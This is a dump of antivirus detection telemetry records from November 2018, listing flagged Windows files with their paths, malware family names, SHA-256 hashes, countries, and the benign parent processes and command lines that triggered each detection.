  Row(detection=Row(filename='avscan-20181104-205819-3fb34da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3e4791d\\AVSCAN-20181104-203906-B9BEEE57\\AVSCAN-20181104-205819-3FB34DA5', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:57:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:38:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F699D02090ACCE4FDBEE30279A93642E5A51CA81A408ABF8A6293E63AC13B5DC', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:41:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iusb3mon.exe', filepath='C:\\Program Files\\Intel\\Intel(R) USB 3.0 eXtensible Host Controller Driver\\Application\\iusb3mon.exe', filesize=328000, name='W32/Jeefo.A.#M1.#R1'), hash='fb14eb244b7bf5d1e164beadfaf557cadf00b5ea715d3ffe44d955431fdcf44b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-01T12:18:26Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='untuk bi.pif', filepath='D:\\DOKUMENKU\\LAPOR BI\\UNTUK BI\\UNTUK BI.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vns311c.tmp', filepath='\\\\?\\C:\\Windows\\Temp\\vns311C.tmp', filesize=128000, name='HEUR/AGEN.1005376.#M1.#R1'), hash='61de101d8bb6f9c6b11c9baef0107f56cf8af497d4d7fb6b3861656bcec86837', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:widacc', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:widacc', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:30:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:33:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trener.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\TRENER.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='system volume information.pif', filepath='g:\\system volume information\\System Volume Information.pif', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:24:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe192_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe192 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T04:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131044-753ee289', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131044-753EE289', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-05-51-21.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:11:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:30:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP908~1\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\User\\Downloads\\Baixaki_aTube Catcher_3927752197.exe', parentsize=2292152, timestamp='2018-11-02T03:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe667_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe667 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T11:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200504-c84859db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1756de49\\AVSCAN-20181102-200451-C59A9FF2\\AVSCAN-20181102-200504-C84859DB', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1944000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='719641c6cfbeeb8bb756b7e212a5f5d4e6bee277c973a0493784a118659fd98a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T17:52:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setuperror.exe', filepath='D:\\upgrate\\sources\\setuperror.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3032cf6376bee15074add20c4bb2ae8e1e266689fc8cb602594921a479c81214', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:49:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T10:12:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='18ece932dc5ab9b84c12acae0b09bb3e431b8b82e92e0216d395101d51957f56', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=455680, timestamp='2018-11-02T12:47:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp2_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp2_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20f956878853aaaabfa30813226bd2272ca4c5f196653a8aca18c07998c0ee56', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202959-3944d575', filepath='E:\\Documents and Settings\\X\\Dati applicazioni\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-202530-DCB9A3FA\\AVSCAN-20181102-202959-3944D575', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:31:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openvpn.exe', filepath='C:\\Program Files (x86)\\VPN Unlimited\\openvpn.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='239f2c85506cf6e390ba59748b42df87f954d10ce36651c6a852bdd0614dbe71', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dtcG\\\\\\/Cv0+kKhPq9N.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T06:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='matrix.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\MATRIX\\MATRIX.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa14420.30359\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa14420.30359\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101932-9b05f944', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101904-971CB8F7\\AVSCAN-20181102-101932-9B05F944', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205154-cf9d5856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14e04295\\AVSCAN-20181102-205023-BE4BC89B\\AVSCAN-20181102-205154-CF9D5856', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:00Z'), dt=datetime.date(2018, 11, 2)),
